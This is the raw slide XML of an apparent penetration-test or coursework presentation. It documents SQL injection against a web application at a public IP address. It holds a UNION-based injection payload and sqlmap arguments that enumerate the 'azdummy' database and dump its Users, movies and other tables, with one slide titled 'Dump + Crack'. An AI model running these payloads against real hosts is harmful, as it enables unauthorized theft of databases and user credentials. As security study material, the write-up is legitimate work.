              <a:t>    Title: Generic UNION query (NULL) - 5 columns</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    Payload: term=' UNION ALL SELECT CONCAT(0x7170767171,0x644d7a4545565869414666654268484668626e576b6242417963546d6a4d4e4b6c5054504c785566,0x71717a7171),NULL,NULL,NULL,NULL-- -</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" sz="1200" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OS Windows 8.1 or 2012 R2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Microsoft IIS 8.5, PHP 7.0.5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MYSQL &gt;= 5.0.12</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" sz="1200" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Found databases</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>azdummy</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>information_schema</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" sz="1200" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" sz="1200" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://54.189.124.94/login.php</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>No found injectable parameters</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2816573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136EDE-418F-DF22-8FAE-10A23706362A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>SQLMap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> - SQL Injection - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>azdummy</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2985939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dirty="0" err="1"/>
              <a:t>azdummy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Tables</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63C38D2F-C239-7260-0814-D85678E460B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="566671" y="1655239"/>
            <a:ext cx="11238886" cy="5009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1400" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{340BF475-95C2-B4A6-D5E7-0C9A76333FB7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="173942" y="2038804"/>
            <a:ext cx="3229392" cy="22394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pl-PL" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-u http://54.189.124.94/index.php?term=  -D azdummy --tables</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="Graphical user interface, text&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1FF341AE-05FB-5F1D-9C71-21F87D517D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9671" y="2129983"/>
            <a:ext cx="8402223" cy="2391109"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1825400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dirty="0" err="1"/>
              <a:t>Azdummy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Users – Dump + Crack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63C38D2F-C239-7260-0814-D85678E460B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="566671" y="1655239"/>
            <a:ext cx="11238886" cy="5009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1400" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{340BF475-95C2-B4A6-D5E7-0C9A76333FB7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="173942" y="2038804"/>
            <a:ext cx="3229392" cy="22394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de-DE" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>-u http://54.189.124.94/index.php?term=  -D azdummy -T "Users" --dump</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C9089E1-3ABE-DD28-6716-41FE4D0A9E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681" y="2398692"/>
            <a:ext cx="7207876" cy="839159"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4122760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dirty="0" err="1"/>
              <a:t>azdummy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Table 4 – Dump</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63C38D2F-C239-7260-0814-D85678E460B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="566671" y="1655239"/>
            <a:ext cx="11238886" cy="5009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1400" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{340BF475-95C2-B4A6-D5E7-0C9A76333FB7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="173942" y="2038804"/>
            <a:ext cx="3229392" cy="22394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fr-FR" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>u http://54.189.124.94/index.php?term=  -D </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>azdummy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -T "TABLE 4" --dump</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="A computer screen capture&#10;&#10;Description automatically generated with medium confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D9F9D5E7-D7BF-C83D-349B-49D53690B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312" y="1860233"/>
            <a:ext cx="7536287" cy="4097856"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3371067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dirty="0" err="1"/>
              <a:t>azdummy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Movies – Dump</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63C38D2F-C239-7260-0814-D85678E460B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="566671" y="1655239"/>
            <a:ext cx="11238886" cy="5009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1400" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{340BF475-95C2-B4A6-D5E7-0C9A76333FB7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="173942" y="2038804"/>
            <a:ext cx="3229392" cy="22394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fr-FR" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-u http://54.189.124.94/index.php?term=  -D </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>azdummy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -T "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>movies</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>" --dump</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="A screenshot of a computer&#10;&#10;Description automatically generated with medium confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63403559-87DA-FC27-D312-45D1E78E7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063" y="1412433"/>
            <a:ext cx="8006695" cy="4868213"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2457278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136EDE-418F-DF22-8FAE-10A23706362A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Website Overview</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="504178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136EDE-418F-DF22-8FAE-10A23706362A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>SQLMap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> - SQL Injection – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>information_schema</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4073335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dirty="0"/>
              <a:t>Information Schema Tables</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63C38D2F-C239-7260-0814-D85678E460B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="566671" y="1655239"/>
            <a:ext cx="11238886" cy="5009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1400" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="Text&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E4BD775-DEF4-53DA-06BC-3C3CC6914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728" y="1520607"/>
            <a:ext cx="5267798" cy="5278842"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{340BF475-95C2-B4A6-D5E7-0C9A76333FB7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="173942" y="2038804"/>
            <a:ext cx="4320786" cy="22394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en-US" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-u http://54.189.124.94/index.php?term=  -D </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>information_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> --tables</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2512230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136EDE-418F-DF22-8FAE-10A23706362A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>SQLMap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> - SQL Injection – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>information_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – Dumps I found Interesting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4119193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sz="2800" dirty="0" err="1"/>
              <a:t>Information_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> - columns</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8" descr="A picture containing chart&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42353B0D-A5EC-A443-1016-DE3A39393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430" y="1412433"/>
            <a:ext cx="10698051" cy="4198078"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3529103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sz="2800" dirty="0" err="1"/>
              <a:t>Information_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> - engines</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="A screenshot of a computer&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EEBCC0FD-D32B-5913-A48E-42199C99CE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546" y="1797524"/>
            <a:ext cx="8830907" cy="3134162"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1576280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sz="2800" dirty="0" err="1"/>
              <a:t>Information_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> – partitions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="Text&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CDCABC77-AB26-850D-6E8F-6DADDD609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924" y="1412433"/>
            <a:ext cx="9996152" cy="4621081"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3940899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sz="2800" dirty="0" err="1"/>
              <a:t>Information_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> – plugins</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="Text&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8775FA04-74C4-90EC-9CA2-F5F64BE65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7902" y="1412433"/>
            <a:ext cx="7636196" cy="4699908"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="203492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sz="2800" dirty="0" err="1"/>
              <a:t>Information_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>processlist</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{693173FE-CB63-CCB6-14A2-64ECBEBB6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942" y="3024980"/>
            <a:ext cx="11200327" cy="808039"/>
          </a:xfrm>
